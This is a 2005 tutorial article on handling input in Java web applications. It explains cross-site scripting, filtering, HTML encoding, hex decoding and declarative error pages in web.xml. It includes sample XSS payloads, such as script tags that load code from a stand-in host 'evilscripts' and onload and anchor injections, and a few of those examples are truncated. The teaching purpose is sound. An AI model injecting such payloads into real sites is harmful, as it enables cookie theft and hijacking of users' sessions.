
Handling Java Web Application Input, Part 2

September 20, 2005


Cross-Site Scripting
   Tags that Allow for Cross-Site Scripting
Threats Of Cross-Site Scripting
Preventing Cross-Site Scripting
Error Reporting

This is the second article in a series on handling Java web
application input. In part one, I talked about validation best
practices and SQL injection attacks. In this article, I will continue
the theme, and in particular will talk about the threat of cross-site
scripting, as well as looking at correctly handling exceptions in J2EE
web applications.

Cross-Site Scripting

Cross-site scripting, also known as XSS, is an attack against
dynamic applications. It occurs when an application ignorantly
accepts input containing units of instruction from an external
source. This input is then sent as part of the response to a
delivery medium such as a web browser, and may also be persisted to
a data store for future display. The success of such an attack is
heavily dependent on a web browser's facility to discern regular
content from instruction: markup and data. Let us consider a simple
example, shown in Figure 1, that allows the posting of movie reviews.

Figure 1. Movie review example

Figure 1 shows a web page that allows a user to post a movie
review. Let us consider what would happen if a movie review was
posted containing some JavaScript code:

  <script> alert("Hello Script Injection"); </script> 

The possible result of this is shown in Figure 2.

Figure 2. Script injection attack

As you can see, this input results in the JavaScript scriptlet
being executed anytime a user requests the web page. In this case,
it displays a harmless alert window. An attacker initiates this
attack by interacting with the application, passing data through
HTML form input fields. This data is then sent to the web server
via an HTTP POST request. On receipt, the web server passes this
request to the J2EE web container, which in turn parses the HTTP
request to extract pertinent data: HTTP headers, request data,
referrer URL, etc. This data is then used to construct a
javax.servlet.http.HttpServletRequest that provides a
programmer-friendly interface to this data. This object is then
used to retrieve the movie data, performing simple validation to
ensure required data has been set.

The problem with this approach is that the validation employed
does not protect against an XSS attack. This is due to the fact
that input data contains characters that are considered special
under the HTML specification. The HTML 4.0 specification includes
around 250 special characters. However, in relation to an XSS
attack, commonly used characters include <, >, &,
{, }, [, ], and %. An attacker can use these characters and
others to construct a series of attack strings that the receiving
web browser will interpret as units of instruction and execute.

Now consider the following tag:

  <script type="text/javascript" src="http://evilscripts/js/evilScript.js" />

This results in the malicious script evilScript.js being
downloaded and executed. A similar attack looks like this:

  <script type="text/javascript">     

The result of this would be the user being redirected to
evilScriptPage.html on every load of the page.

An anchor can hide a script, too:

  <A HREF="
  <SCRIPT SRC='http://evilscripts/js/evilScript.js'></SCRIPT>">
  Go to Movies web site</A> 

This is a link that, when followed, executes the
evilScript.js script.

There are also "inline" script attacks, which work in newer browsers:

  <body onload="javascript:alert('Hello Inline Script Attack');">

Finally, there are attacks that launch when the user mouses over
an image:

    src="images/example.gif" id="example"
    width="482" height="297" alt="example" />

This is an image that redirects a user to
http://evilscripts/js/evilScriptPage.html when the mouse is
placed over the image.

Tags that Allow for Cross-Site Scripting

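Common exploits include the use of tags that can carry script, such as
the script, anchor, body, and image tags shown above. A harmless example
is an injected script whose output writes "Hello JavaScript!" to the web page.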

A script injection attack does not necessarily have to be
initiated with malicious intent. For example, a well-meaning user
could enter standard HTML markup and alter page formatting,
seriously defacing the look of a website.

Threats Of Cross-Site Scripting

The exploits achieved through script injection vary across a
large spectrum. This is due to the nature of the attack: any website that provides a facility for an attacker to insert
instructions into a web page opens an application up to a variety
of attacks, causing serious ramifications. An exploit is heavily
dependent on the environment in which the malicious code executes,
such as the privileges granted to the account under which the
application runs and the programming language used. Some common
exploits achieved through cross-site scripting include:

  • The attacker can steal cookies, inserting a script into a web page
    of a vulnerable website. This script collects user cookies and then
    sends them to the attacker. The attacker can then impersonate a
    user (which is particularly dangerous in a single sign-on
    environment), possibly gaining access to sensitive data such as
    credit card numbers and passwords.
  • The attacker can insert a malicious link into a popular website, usually encoding it to make it difficult to discern from a
    well-meaning link; when a user clicks on the link, a malicious
    script is executed. A link could also be used to redirect a user to
    a malicious web page that takes on the appearance of a trusted
    site, possibly requesting security credentials.
  • User input may be intercepted. An attacker could write a script
    that monitors user input and sends sensitive data back to the
    attacker.
  • An attacker can trick the web server into executing malicious
    code in the same context as trusted code. This can give the
    attacker access to the web server and, possibly, to the network.
  • An attacker can deface a website, rendering it unreadable or
    adding any content they see fit.
  • An attacker can use the application logger to inject malicious
    input into the application. This input can be executed if logs are
    viewed in HTML form. Therefore, a good security practice is to wrap
    the application logger using a custom implementation that filters
    malicious input.
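
The logger wrapper mentioned in the last point could look something like the following. This is only a minimal sketch: the class name SafeLogger and its sanitize method are my own invention for illustration, it wraps java.util.logging rather than any particular logging framework, and it reuses the simple replace-with-a-space filter discussed later in this article. It also replaces line breaks, on the assumption that you do not want input to be able to forge extra log entries.

```java
import java.util.logging.Logger;

/** Hypothetical wrapper (not a library class): filters input before it is logged. */
final class SafeLogger {
    // Characters treated as dangerous here, plus CR and LF. The exact set is an assumption.
    private static final String UNSAFE = "[<>{}\\[\\];&\\r\\n]";

    private final Logger delegate;

    SafeLogger(Logger delegate) {
        this.delegate = delegate;
    }

    /** Replaces each unsafe character with a single space. */
    static String sanitize(String message) {
        return message == null ? "" : message.replaceAll(UNSAFE, " ");
    }

    /** Logs the filtered message at INFO level through the wrapped logger. */
    void info(String message) {
        delegate.info(sanitize(message));
    }
}
```

A caller would create it once, for example new SafeLogger(Logger.getLogger("reviews")), and route any message containing user-supplied data through it.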

Preventing Cross-Site Scripting

One approach to prevention is to configure the web
browser to disable scripting. Unfortunately, this is not always a
viable option, as it affects functionality and, worse, relies on
each user configuring their own browser. Therefore we need to plug in
some validation code. However, before banging out any code, it is
important to understand that an attacker will take measures to
evade any validation code that tests for dangerous
special characters. This will normally be carried out by using
numeric character references such as hexadecimal and decimal, or
character entity references of special characters for a particular
character set, like the following:

Char           <    >    "    :    {    }    [    ]    ;
Hex char code  %3c  %3e  %22  %3a  %7b  %7d  %5b  %5d  %3b
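
To see why these alternative representations matter, consider a check that looks only for the literal characters. The sketch below is illustrative only: the class EncodedInputCheck and its method names are made up for this example, UTF-8 is an assumed encoding, and it uses the standard java.net.URLDecoder to turn %xx sequences back into characters before checking again.

```java
import java.io.UnsupportedEncodingException;
import java.net.URLDecoder;
import java.util.regex.Pattern;

/** Hypothetical demo class: shows a literal-only check missing encoded input. */
final class EncodedInputCheck {
    // The special characters from the table above, in literal form.
    private static final Pattern SPECIAL = Pattern.compile("[<>\":{}\\[\\];]");

    /** Naive check: true only if a literal special character is present. */
    static boolean containsSpecial(String input) {
        return SPECIAL.matcher(input).find();
    }

    /** Decodes %xx sequences (UTF-8 assumed) and then applies the same check. */
    static boolean containsSpecialAfterDecoding(String input) {
        try {
            return containsSpecial(URLDecoder.decode(input, "UTF-8"));
        } catch (UnsupportedEncodingException e) {
            // Every Java platform is required to support UTF-8.
            throw new IllegalStateException(e);
        }
    }
}
```

With the input %3cscript%3e, the naive check finds nothing, while the check after decoding finds the angle brackets.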

In order to be able to detect special characters, it is vital that
the web server explicitly set the character set of any web page.
If the character set is not explicitly set in the HTML output, an
attacker can set a different character set. An attacker can then
pass malicious content containing special characters in a different
encoding, which the validation code cannot recognize, rendering it
ineffective. The character set of a web page can be set by specifying
the meta tag in the head section of an
HTML page:

        <META http-equiv="Content-Type"
        content="text/html; charset=ISO-8859-1">

The above declaration sets the character set to ISO-8859-1 (Latin-1),
which covers Western European languages. When writing validation
code, it is important to be aware of what character set is being
used in order to correctly recognize special characters.

Once this is set, the next step is to craft some validation
code. When writing this code, it is critical to understand that
every application is different (different internationalization
requirements, etc.) and secure coding practices that protect one
application may not protect another. Therefore, before writing any
code, it is important to play the role of the attacker, looking for
any entry points from which data is input from an unknown source.
Once these points have been identified, it is important to construct
attack strings in order to understand how your application can be
exploited. When it comes to writing some validation code there are
two main choices: filtering and encoding.


The safest and perhaps most performant method of protecting
against attack is to only accept data that is deemed valid and
reject everything else, possibly returning an error to the client.
For example, if the input data is expected to be numeric, then
ensure that this is the case by rejecting any input that is
not numeric:
  final String inputStr = request.getParameter("input");
  final String numericPattern = "^\\d+$";
  /* getParameter returns null when the parameter is absent */
  if (inputStr == null || !inputStr.matches(numericPattern)) {
        /* invalid input, do something with error */
  }

Although this is the best form of prevention and would work well
for the movie review example, it may not be practical to reject all
data. In this case, a cleaning routine can be used, which checks for
the existence of special characters and replaces each with another
character, such as a space.

  /* regular expression that
   * matches malicious characters; each match
   * is replaced with a space. */
  final String filterPattern = "[<>{}\\[\\];\\&]";
  /* s holds the raw, untrusted input */
  String inputStr = s.replaceAll(filterPattern, " ");
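
The two strategies, rejecting and cleaning, might be combined for the movie review example roughly as follows. Treat this as a sketch under assumptions: the class ReviewInput, the idea of a numeric "rating" field, and the nine-digit limit (chosen so the value always fits in an int) are mine and do not come from the example application.

```java
import java.util.regex.Pattern;

/** Hypothetical helper for the movie review form. */
final class ReviewInput {
    // One to nine digits, so Integer.parseInt cannot overflow.
    private static final Pattern NUMERIC = Pattern.compile("\\d{1,9}");
    // Same character class as the cleaning routine above.
    private static final Pattern SPECIAL = Pattern.compile("[<>{}\\[\\];&]");

    /** Accepts only numeric input; anything else is rejected with an exception. */
    static int parseRating(String raw) {
        if (raw == null || !NUMERIC.matcher(raw).matches()) {
            throw new IllegalArgumentException("rating must be numeric");
        }
        return Integer.parseInt(raw);
    }

    /** Replaces each special character in free text with a space. */
    static String cleanText(String raw) {
        return raw == null ? "" : SPECIAL.matcher(raw).replaceAll(" ");
    }
}
```

Compiling the patterns once, rather than calling String.matches and String.replaceAll on every request, avoids recompiling the regular expressions each time.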


In certain situations, it is not viable to reject certain input.
For example, consider an online forum that allows programmers to
post code. If code is filtered, it will not display correctly,
making messages difficult to understand. In this case, we cannot
apply filtering and need an alternative approach.

One such approach is to encode the data. Encoding transforms
harmful characters into their display equivalents by using
character entity references or numeric character references. For
example, < and > will be transformed into &lt; and
&gt; respectively. However, when applying this approach, it is
important to set the character set of the response, as shown
earlier. This is needed due to the way in which the web server and
the web browser interact when sending data over the wire. When a web
server needs to send characters to a browser, it needs to convert
them into a series of bytes. When the browser receives these bytes,
it needs to convert them back into a stream of characters. The
charset parameter of the Content-Type header specifies how this
conversion is done.
Likewise, when you write dynamic content using a JSP or in a
servlet using response.getWriter(), the web container
converts strings into bytes using the specified character set. When
encoding is used, the character references generated by the
encoding routine are sent over the wire as special byte sequences
regulated by the particular character set. If the character set is
not set, when the web browser receives the stream of bytes, it may
use a different character set to transform the data into a
character stream. This makes it possible that during the
transformation process, encoded characters may be transformed into
special characters. The different character sets use different byte
sequences to represent characters, and this destroys your encoding.
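
The effect of a mismatch between the character set used to write the bytes and the one used to read them can be reproduced in a few lines of plain Java. This is a small illustration only, with no web container involved; the class CharsetMismatchDemo and its transmit method are names I made up for it.

```java
import java.nio.charset.Charset;
import java.nio.charset.StandardCharsets;

/** Hypothetical demo: one side writes bytes, the other side reads them back. */
final class CharsetMismatchDemo {
    /** Converts text to bytes with one charset and back to text with another. */
    static String transmit(String text, Charset serverCharset, Charset browserCharset) {
        byte[] wire = text.getBytes(serverCharset);   // what goes over the wire
        return new String(wire, browserCharset);      // what the receiver reconstructs
    }

    public static void main(String[] args) {
        String original = "caf\u00e9";  // "cafe" with an acute accent on the e
        // Same charset on both sides: the text survives.
        System.out.println(transmit(original,
                StandardCharsets.ISO_8859_1, StandardCharsets.ISO_8859_1));
        // Written as UTF-8 but read as ISO-8859-1: the accented letter
        // arrives as two different characters.
        System.out.println(transmit(original,
                StandardCharsets.UTF_8, StandardCharsets.ISO_8859_1));
    }
}
```

The receiver has no way to know that the bytes were misread, which is why the response should always declare its character set.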

The following code is a simple routine that encodes any input passed
to it for display in a web browser into its equivalent form, using
decimal character references:

  public static String encode(String data) {
        final StringBuilder buf = new StringBuilder();
        final char[] chars = data.toCharArray();
        for (int i = 0; i < chars.length; i++) {
                /* each character becomes &#NNN; (decimal code, closed by ';') */
                buf.append("&#").append((int) chars[i]).append(';');
        }
        return buf.toString();
  }

For example, passing:

    <script> alert("Hello Script Injection"); </script> 

is transformed into a string of decimal character references. The
opening script tag, for instance, becomes:

    &#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;

This enables the browser to treat it as a harmless string and
not as executable content. The JSP Standard Tag Library
(JSTL) provides similar functionality through the
standard out tag, which encodes various HTML special
characters using character entity references. An important
consideration when using encoding is that it can incur a
performance penalty. Furthermore, as stated earlier, an attacker
may enter a different representation of special characters when
sending the data to the server (such as using a hexadecimal
representation). As a result, data should be decoded before encoding:

  /* requires: import java.io.UnsupportedEncodingException; */
  public static String decodeHex(final String data,
                                 final String charEncoding) {
    if (data == null) {
        return null;
    }
    byte[] inBytes = null;
    try {
        inBytes = data.getBytes(charEncoding);
    } catch (UnsupportedEncodingException e) {
        //use default charset
        inBytes = data.getBytes();
    }
    byte[] outBytes = new byte[inBytes.length];

    int b1;
    int b2;
    int j = 0;
    for (int i = 0; i < inBytes.length; i++) {
        if (inBytes[i] == '%' && i + 2 < inBytes.length) {
            b1 = Character.digit((char) inBytes[i + 1], 16);
            b2 = Character.digit((char) inBytes[i + 2], 16);
            if (b1 >= 0 && b2 >= 0) {
                /* valid %xx sequence: emit the decoded byte */
                outBytes[j++] = (byte) ((b1 << 4) + b2);
                i += 2;
                continue;
            }
        }
        /* ordinary byte, or a '%' not followed by two hex digits */
        outBytes[j++] = inBytes[i];
    }
    String encodedStr = null;
    try {
        encodedStr = new String(outBytes, 0, j, charEncoding);
    } catch (UnsupportedEncodingException e) {
        encodedStr = new String(outBytes, 0, j);
    }
    return encodedStr;
  }


The above code is used to decode any hexadecimal-encoded
characters. It accepts a string containing the data to decode, along
with the character set to decode the data to (such as UTF-8 or 8859_1).
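
Putting the two steps together, decoding first and encoding second, might look like the sketch below. It is not the article's routine: the class OutputEncoder is hypothetical, it swaps in the standard java.net.URLDecoder for the hand-written decoder (note that URLDecoder also turns a plus sign into a space), it assumes UTF-8, and it uses character entity references for a handful of characters rather than encoding every character numerically.

```java
import java.io.UnsupportedEncodingException;
import java.net.URLDecoder;

/** Hypothetical helper: decode percent-encoded input, then escape it for HTML. */
final class OutputEncoder {

    /** Replaces HTML-significant characters with character references. */
    static String escapeHtml(String data) {
        StringBuilder buf = new StringBuilder(data.length() + 16);
        for (int i = 0; i < data.length(); i++) {
            char c = data.charAt(i);
            switch (c) {
                case '<':  buf.append("&lt;");   break;
                case '>':  buf.append("&gt;");   break;
                case '&':  buf.append("&amp;");  break;
                case '"':  buf.append("&quot;"); break;
                case '\'': buf.append("&#39;");  break;
                default:   buf.append(c);
            }
        }
        return buf.toString();
    }

    /** Decodes %xx sequences (UTF-8 assumed), then escapes the result. */
    static String decodeThenEscape(String data) {
        try {
            return escapeHtml(URLDecoder.decode(data, "UTF-8"));
        } catch (UnsupportedEncodingException e) {
            // Every Java platform is required to support UTF-8.
            throw new IllegalStateException(e);
        }
    }
}
```

Escaping only the significant characters keeps ordinary text readable in the page source and produces much shorter output than a numeric reference for every character.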

An important decision is where to apply the validation
techniques. The two main places where this is commonly done are on
receipt of the request or when writing the response. It is
generally a good idea to apply both, and the decision to do so will
depend on the specific requirements of the application. Any input
data should be validated on receipt, ensuring that it is of the required
type whenever possible. Encoding should be performed when writing
the response. A good practice for doing this in a JSP page is to
use a custom tag. This is due to the fact that data does not
necessarily have to be input via the web application. Data can be
input into an application via a number of different methods:
through logging, entered directly into a database, etc.

Error Reporting

During the process of conducting an attack, an attacker will
usually pass some input that will result in a web server returning
an error. A poorly designed error-handling infrastructure will
allow an attacker to learn more about the system they are trying to
exploit. An attacker can use this newfound knowledge to trigger a
stronger attack the next time around. Therefore, it is critical to
limit the information returned.

A best practice for handling this kind of situation is to return
a generic error message to the client and log the error, including
any resultant exceptions and the corresponding stack traces, to the
application log file, possibly emailing a system administrator if
persistent error conditions occur. A J2EE-compliant web container
provides a nice fit for this scenario, using declarative error
handling through the error-page element of the
application deployment descriptor web.xml. The
error-page element allows you to map HTTP response
codes (such as 500 Internal Server Error and 404 Not Found), as
well as thrown exceptions, to a specific error-handling page:

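  <!-- Maps the 404 Not Found response code to the error page /errPage404 -->
  <error-page>
    <error-code>404</error-code><location>/errPage404</location>
  </error-page>
  <!-- Maps any thrown ServletExceptions to the error page /errPageServ -->
  <error-page>
    <exception-type>javax.servlet.ServletException</exception-type><location>/errPageServ</location>
  </error-page>
  <!-- Maps any other thrown exceptions to a generic error page /errPageGeneric -->
  <error-page>
    <exception-type>java.lang.Throwable</exception-type><location>/errPageGeneric</location>
  </error-page>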


The location element is used to specify the
resource (servlet, JSP, etc.) that will handle an error when thrown,
the error-code element specifies the error
code to be handled, and the exception-type
element specifies the exception to be handled. For instance, in the
above example, any error that is sent with the error code 404 will
be intercepted by the web container and forwarded to the resource
located at /errPage404. Likewise, any exception that is thrown that
is not an instance of javax.servlet.ServletException
will also be forwarded, in this case to /errPageGeneric. The
exception and error code can be
retrieved by a servlet handling the error using:

  Throwable throwable = (Throwable)
    request.getAttribute("javax.servlet.error.exception");

  String status_code = ((Integer)
    request.getAttribute("javax.servlet.error.status_code")).toString( );

The error details can then be logged to a log file, and a
generic error message can be returned to the client that contains
no specific error details or stack traces that would aid an attacker.
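
Stripped of the servlet plumbing, the log-everything, reveal-nothing idea can be sketched in plain Java as shown below. The class ErrorReporter is hypothetical, and the incident reference is my own addition rather than anything the servlet specification provides; it is there so that a user's report can be matched to the detailed log entry.

```java
import java.util.UUID;
import java.util.logging.Level;
import java.util.logging.Logger;

/** Hypothetical helper: full detail goes to the log, a generic message to the client. */
final class ErrorReporter {
    private static final Logger LOG = Logger.getLogger(ErrorReporter.class.getName());

    /**
     * Logs the exception and status code on the server and returns
     * a message that is safe to show to the client.
     */
    static String report(Throwable error, int statusCode) {
        String incidentId = UUID.randomUUID().toString();
        // The stack trace and exception message stay in the application log.
        LOG.log(Level.SEVERE, "incident " + incidentId + ", status " + statusCode, error);
        // The client sees neither the exception type nor its message.
        return "An unexpected error occurred. Reference: " + incidentId;
    }
}
```

In an error-handling servlet, the two arguments would come from the request attributes shown above, and the returned string would be written to the response.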


In this series, we looked at the importance of handling
application input correctly. In particular, we looked at validation
best practices as well as the threats of SQL injection and cross-site scripting. It is hoped that these articles have provided a
good starting point for J2EE developers, helping to understand and
appreciate the seriousness of the very real and dangerous threat
posed by inadequate data validation. The appearance of automated
tools and the incorporation of new features into the various
specifications and web browsers have resulted in attackers finding
new and innovative ways to exploit an application through
application input. An attacker can initiate an attack through a web
browser by constructing attack strings, sending them via an HTTP GET
request through URL tampering, via an HTTP POST request through HTML
forms, or by other means. It is therefore critical that any possibility
for data being input into an application from an external source is
carefully analyzed, and secure coding practices put in place to
meet the specific validation needs of an application in order to
neutralize any threats.


Stephen Enright is a Dublin-based software engineer.